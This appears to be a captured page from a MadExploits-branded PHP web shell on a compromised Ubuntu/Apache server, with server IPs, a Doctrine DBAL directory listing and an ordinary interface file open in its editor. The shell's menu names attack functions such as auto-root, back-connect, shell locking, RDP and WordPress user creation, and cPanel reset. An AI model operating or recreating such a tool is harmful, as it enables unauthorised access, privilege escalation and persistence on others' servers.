Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.202
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
vendor /
doctrine /
dbal /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
ArrayParameters
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
Connections
[ DIR ]
drwxr-xr-x
Driver
[ DIR ]
drwxr-xr-x
Event
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Id
[ DIR ]
drwxr-xr-x
Logging
[ DIR ]
drwxr-xr-x
Platforms
[ DIR ]
drwxr-xr-x
Portability
[ DIR ]
drwxr-xr-x
Query
[ DIR ]
drwxr-xr-x
SQL
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Tools
[ DIR ]
drwxr-xr-x
Types
[ DIR ]
drwxr-xr-x
ArrayParameterType.php
982
B
-rw-r--r--
ColumnCase.php
429
B
-rw-r--r--
Configuration.php
6.52
KB
-rw-r--r--
Connection.php
62.62
KB
-rw-r--r--
ConnectionException.php
917
B
-rw-r--r--
Driver.php
1.62
KB
-rw-r--r--
DriverManager.php
8.95
KB
-rw-r--r--
Events.php
1.58
KB
-rw-r--r--
Exception.php
4.95
KB
-rw-r--r--
ExpandArrayParameters.php
3.69
KB
-rw-r--r--
FetchMode.php
333
B
-rw-r--r--
LockMode.php
419
B
-rw-r--r--
ParameterType.php
982
B
-rw-r--r--
Query.php
1.16
KB
-rw-r--r--
Result.php
7.85
KB
-rw-r--r--
Statement.php
7.46
KB
-rw-r--r--
TransactionIsolationLevel.php
601
B
-rw-r--r--
VersionAwarePlatformDriver.php
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : VersionAwarePlatformDriver.php
<?php namespace Doctrine\DBAL; use Doctrine\DBAL\Platforms\AbstractPlatform; /** * Contract for a driver that is able to create platform instances by version. * * Doctrine uses different platform classes for different vendor versions to * support the correct features and SQL syntax of each version. * This interface should be implemented by drivers that are capable to do this * distinction. * * @deprecated All drivers will have to be aware of the server version in the next major release. */ interface VersionAwarePlatformDriver extends Driver { /** * Factory method for creating the appropriate platform instance for the given version. * * @param string $version The platform/server version string to evaluate. This should be given in the notation * the underlying database vendor uses. * * @return AbstractPlatform * * @throws Exception If the given version string could not be evaluated. */ public function createDatabasePlatformForVersion($version); }
Close